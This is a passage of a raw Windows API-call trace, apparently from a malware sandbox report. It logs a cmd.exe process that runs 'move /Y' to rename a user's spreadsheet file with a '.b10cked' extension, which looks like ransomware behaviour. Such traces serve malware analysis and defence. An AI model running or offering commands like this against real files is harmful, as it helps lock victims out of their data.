(in: lpAddress=0x51000, lpBuffer=0x14faac, dwLength=0x1c | out: lpBuffer=0x14faac*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.070] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14faac, dwLength=0x1c | out: lpBuffer=0x14faac*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.070] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14faac, dwLength=0x1c | out: lpBuffer=0x14faac*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.070] GetConsoleOutputCP () returned 0x1b5 [0235.070] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.070] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.070] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.070] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.071] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.071] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.071] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.071] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.071] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.071] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.071] GetEnvironmentStringsW () returned 0x1c0198* [0235.071] FreeEnvironmentStringsW (penv=0x1c0198) returned 1 [0235.072] GetEnvironmentStringsW () returned 0x1c0198* [0235.072] FreeEnvironmentStringsW (penv=0x1c0198) returned 1 [0235.072] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ea4c | out: phkResult=0x14ea4c*=0x40) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x0, lpData=0x14ea58*=0xc0, lpcbData=0x14ea50*=0x1000) returned 0x2 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x1, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x0, lpData=0x14ea58*=0x1, lpcbData=0x14ea50*=0x1000) returned 0x2 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x0, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x40, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x40, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x0, lpData=0x14ea58*=0x40, lpcbData=0x14ea50*=0x1000) returned 0x2 [0235.072] RegCloseKey (hKey=0x40) returned 0x0 [0235.072] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ea4c | out: phkResult=0x14ea4c*=0x40) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x0, lpData=0x14ea58*=0x40, lpcbData=0x14ea50*=0x1000) returned 0x2 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x1, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x0, lpData=0x14ea58*=0x1, lpcbData=0x14ea50*=0x1000) returned 0x2 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x0, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x9, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x9, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x0, lpData=0x14ea58*=0x9, lpcbData=0x14ea50*=0x1000) returned 0x2 [0235.072] RegCloseKey (hKey=0x40) returned 0x0 [0235.072] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0235.072] srand (_Seed=0x5b8863c2) [0235.072] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked\"" [0235.072] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked\"" [0235.073] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.073] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1c18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.073] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.073] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.073] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.073] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.073] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.073] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.074] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.074] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.074] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.074] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.074] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.074] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.074] GetEnvironmentStringsW () returned 0x1c22e8* [0235.074] FreeEnvironmentStringsW (penv=0x1c22e8) returned 1 [0235.074] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.074] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.074] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.074] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.074] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.074] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.074] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.074] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.074] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.074] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.074] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f818 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.074] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f818, lpFilePart=0x14f814 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f814*="Desktop") returned 0x18 [0235.074] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.074] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f594 | out: lpFindFileData=0x14f594) returned 0x1c0028 [0235.075] FindClose (in: hFindFile=0x1c0028 | out: hFindFile=0x1c0028) returned 1 [0235.075] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f594 | out: lpFindFileData=0x14f594) returned 0x1c0028 [0235.075] FindClose (in: hFindFile=0x1c0028 | out: hFindFile=0x1c0028) returned 1 [0235.075] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f594 | out: lpFindFileData=0x14f594) returned 0x1c0028 [0235.075] FindClose (in: hFindFile=0x1c0028 | out: hFindFile=0x1c0028) returned 1 [0235.075] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.075] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.075] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.075] GetEnvironmentStringsW () returned 0x1c2b08* [0235.076] FreeEnvironmentStringsW (penv=0x1c2b08) returned 1 [0235.076] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.076] GetConsoleOutputCP () returned 0x1b5 [0235.076] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.076] GetUserDefaultLCID () returned 0x409 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f958, cchData=128 | out: lpLCData="0") returned 2 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f958, cchData=128 | out: lpLCData="0") returned 2 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f958, cchData=128 | out: lpLCData="1") returned 2 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.078] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.078] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.078] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.079] GetConsoleTitleW (in: lpConsoleTitle=0x1b08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.079] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.079] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.079] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.079] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.080] _wcsicmp (_String1="move", _String2=")") returned 68 [0235.080] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0235.080] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0235.080] _wcsicmp (_String1="IF", _String2="move") returned -4 [0235.080] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0235.080] _wcsicmp (_String1="REM", _String2="move") returned 5 [0235.080] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0235.083] GetConsoleTitleW (in: lpConsoleTitle=0x14f650, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.083] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0235.083] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0235.083] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0235.083] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0235.083] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0235.083] _wcsicmp (_String1="move", _String2="CD") returned 10 [0235.084] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0235.084] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0235.084] _wcsicmp (_String1="move", _String2="REN") returned -5 [0235.084] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0235.084] _wcsicmp (_String1="move", _String2="SET") returned -6 [0235.084] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0235.084] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0235.084] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0235.084] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0235.084] _wcsicmp (_String1="move", _String2="MD") returned 11 [0235.084] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0235.084] _wcsicmp (_String1="move", _String2="RD") returned -5 [0235.084] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0235.084] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0235.084] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0235.084] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0235.084] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0235.084] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0235.084] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0235.084] _wcsicmp (_String1="move", _String2="VER") returned -9 [0235.084] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0235.084] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0235.084] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0235.084] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0235.084] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0235.084] _wcsicmp (_String1="move", _String2="START") returned -6 [0235.084] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0235.084] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0235.084] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0235.086] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.086] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.086] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f40c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f404, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f404*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0235.087] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0235.087] _wcsicmp (_String1="GAY66U~1.OTS", _String2=".") returned 57 [0235.087] _wcsicmp (_String1="GAY66U~1.OTS", _String2="..") returned 57 [0235.087] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\gay66u~1.ots")) returned 0x20 [0235.087] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1c1e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.087] SetErrorMode (uMode=0x0) returned 0x0 [0235.087] SetErrorMode (uMode=0x1) returned 0x0 [0235.087] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS", nBufferLength=0x104, lpBuffer=0x14ed94, lpFilePart=0x14ed7c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS", lpFilePart=0x14ed7c*="GAY66U~1.OTS") returned 0x2f [0235.087] SetErrorMode (uMode=0x0) returned 0x1 [0235.087] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x12 [0235.088] _wcsicmp (_String1="GAY66U~1.OTS", _String2=".") returned 57 [0235.088] _wcsicmp (_String1="GAY66U~1.OTS", _String2="..") returned 57 [0235.088] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\gay66u~1.ots")) returned 0x20 [0235.088] SetErrorMode (uMode=0x0) returned 0x0 [0235.088] SetErrorMode (uMode=0x1) returned 0x0 [0235.088] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS", nBufferLength=0x104, lpBuffer=0x14f210, lpFilePart=0x14efa8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS", lpFilePart=0x14efa8*="GAY66U~1.OTS") returned 0x2f [0235.088] SetErrorMode (uMode=0x0) returned 0x1 [0235.088] SetErrorMode (uMode=0x0) returned 0x0 [0235.088] SetErrorMode (uMode=0x1) returned 0x0 [0235.088] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked", nBufferLength=0x104, lpBuffer=0x14f418, lpFilePart=0x14efa8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked", lpFilePart=0x14efa8*="gaY66uwM4.ots.b10cked") returned 0x38 [0235.088] SetErrorMode (uMode=0x0) returned 0x1 [0235.088] SetLastError (dwErrCode=0x0) [0235.088] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\gay66uwm4.ots.b10cked")) returned 0xffffffff [0235.088] GetLastError () returned 0x2 [0235.088] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x14e924, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e924) returned 0x1b0eb0 [0235.088] FindNextFileW (in: hFindFile=0x1b0eb0, lpFindFileData=0x14e924 | out: lpFindFileData=0x14e924) returned 0 [0235.089] GetLastError () returned 0x12 [0235.089] FindClose (in: hFindFile=0x1b0eb0 | out: hFindFile=0x1b0eb0) returned 1 [0235.090] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x1c1c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1c1c08) returned 0x1b0eb0 [0235.090] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked", nBufferLength=0x104, lpBuffer=0x14ebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked", lpFilePart=0x0) returned 0x38 [0235.090] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots", nBufferLength=0x104, lpBuffer=0x14ebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots", lpFilePart=0x0) returned 0x30 [0235.090] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\gay66uwm4.ots")) returned 0x20 [0235.090] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\gay66uwm4.ots"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\gay66uwm4.ots.b10cked"), dwFlags=0x3) returned 1 [0235.090] FindClose (in: hFindFile=0x1b0eb0 | out: hFindFile=0x1b0eb0) returned 1 [0235.091] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14eb70 | out: _Buffer=" 1") returned 9 [0235.091] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.091] GetFileType (hFile=0x7) returned 0x2 [0235.382] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.382] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14eafc | out: lpMode=0x14eafc) returned 1 [0235.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.382] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14eb30 | out: lpConsoleScreenBufferInfo=0x14eb30) returned 1 [0235.382] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.383] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x14eb70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.383] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, 